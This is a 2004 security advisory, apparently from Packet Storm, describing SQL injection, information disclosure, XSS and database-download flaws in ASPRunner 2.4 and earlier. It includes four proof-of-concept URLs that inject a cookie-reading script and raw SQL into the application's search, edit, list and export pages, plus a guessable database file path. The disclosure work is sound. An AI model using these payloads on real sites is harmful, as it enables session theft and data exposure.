exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ASPRunner.txt

ASPRunner.txt
Posted Jul 28, 2004
Authored by Ferruh Mavituna | Site ferruh.mavituna.com

ASPRunner versions 2.x suffer from multiple vulnerabilities. Various SQL Injection, information disclosure, cross site scripting, and database download flaws exit.

tags | advisory, vulnerability, xss, sql injection, info disclosure
SHA-256 | 49fdab9c6e54038eccdf55c5a3fa83ec824ccbc7158bd11e4f789fdb4f2b64d6

ASPRunner.txt

Change Mirror Download
  ASPRunner Multiple Vulnerabilities ;

1) SQL Injection;
Severity : Moderatly Critical

2) Information Disclosure;
Severity : Low Critical

3) XSS (Cross Site Scripting);
Severity : Low Critical

4) Database Download;
Severity : Moderatly Critical


------------------------------------------------------
ABOUT ASPRunner;
------------------------------------------------------
Developer Description;
ASPRunner creates a set of ASP pages to access and modify Oracle, SQL Server, MS Access , DB2, MySQL, or FileMaker databases, or any other ODBC datasource. Using generated ASP pages, users can search, sort, edit, delete and add data into a database. ASPRunner is easy to learn, you can get started in just 10 minutes!

URL & Demo Download ;
http://www.xlinesoft.com/asprunner/


------------------------------------------------------
VULNERABLE;
------------------------------------------------------
ASPRunner version 2.4 and below


------------------------------------------------------
NOT VULNERABLE;
------------------------------------------------------
-

------------------------------------------------------
1) SQL Injection;
------------------------------------------------------
Every Page is vulnerable to SQL Injection atacks. (Login pages are not vulnerable).
There is no POC because of SQL Injection attacks depends on database type and structure.



------------------------------------------------------
2) INFORMATION DISCLOSURE;
------------------------------------------------------
An attacker can gain several information from hidden fields and file names.

- File names disclosure database generated table name.
- Several hidden field shows complete SQL Queries
- Also these hidden fields can be modified.
- Errors are generating detailed page which gives lots of information to the client.

------------------------------------------------------
3) XSS (Cross Site Scripting);
------------------------------------------------------
There are no control for XSS attacks, some samples from several pages;

- [TABLE]_search.asp (post)
http://[VICTIM]/[TABLE-NAME]_search.asp?action=AdvancedSearch&FieldName=word_id&NeedQuoteswordid=False%2C+False&Typewordid=3%2C+3&SearchOption=Contains&SearchFor=&FieldName=tr&NeedQuotestr=True&Typetr=202&SearchOption=Contains&SearchFor=&FieldName=en&NeedQuotesen=True&Typeen=202&SearchOption=Contains&SearchFor=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&FieldName=desc&NeedQuotesdesc=True&Typedesc=203&SearchOption=Contains&SearchFor=


- [TABLE]_edit.asp (post)
http://[VICTIM]/[TABLE-NAME]_edit.asp?editid=2822&editid2=&editid3=&TargetPageNumber=1&SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Eselect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&NeedQuoteswordid=False&NeedQuotes=&NeedQuotes=&action=view


- [TABLE]_list.asp (post)
http://[VICTIM]/[TABLE-NAME]_list.asp?TargetPageNumber=1&sourceID=&cmdGotoPage=&action=Search&SQL=select+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++where+1%3D0+or+%5Btr%5D+like+%27%25&orderby=+order+by+%5Ben%5D+desc&PageSize=20&SearchField=AnyField&SearchOption=Contains&SearchFor=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&PageSizeSelect=20&NeedQuoteswordid=False&Typewordid=3&NeedQuoteswordid=False&Typewordid=3&NeedQuotestr=True&Typetr=202&NeedQuotesen=True&Typeen=202&NeedQuotesdesc=True&Typedesc=203

- export.asp (post)
http://[VICTIM]/export.asp?SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Eselect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&mypage=1&pagesize=20



------------------------------------------------------
4) Database Download;
------------------------------------------------------
Database can be downloaded over web. This is not a critical issue because there is no way to determine filename. But it's easy to guess it by gathering information about table and field names.

MS Access or other database file (if it's not MSSQL, similiar or ODBC Connection) can be found on http://[VICTIM]/db/[DB-FILE-NAME]



-----------------------------------------------------
HISTORY;
------------------------------------------------------
Discovered : 04.07.2004
Vendor Informed : 05.07.2004
Published : 26.07.2004

------------------------------------------------------
Vendor Status;
------------------------------------------------------
2 emails, No Reply, No Fix


Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close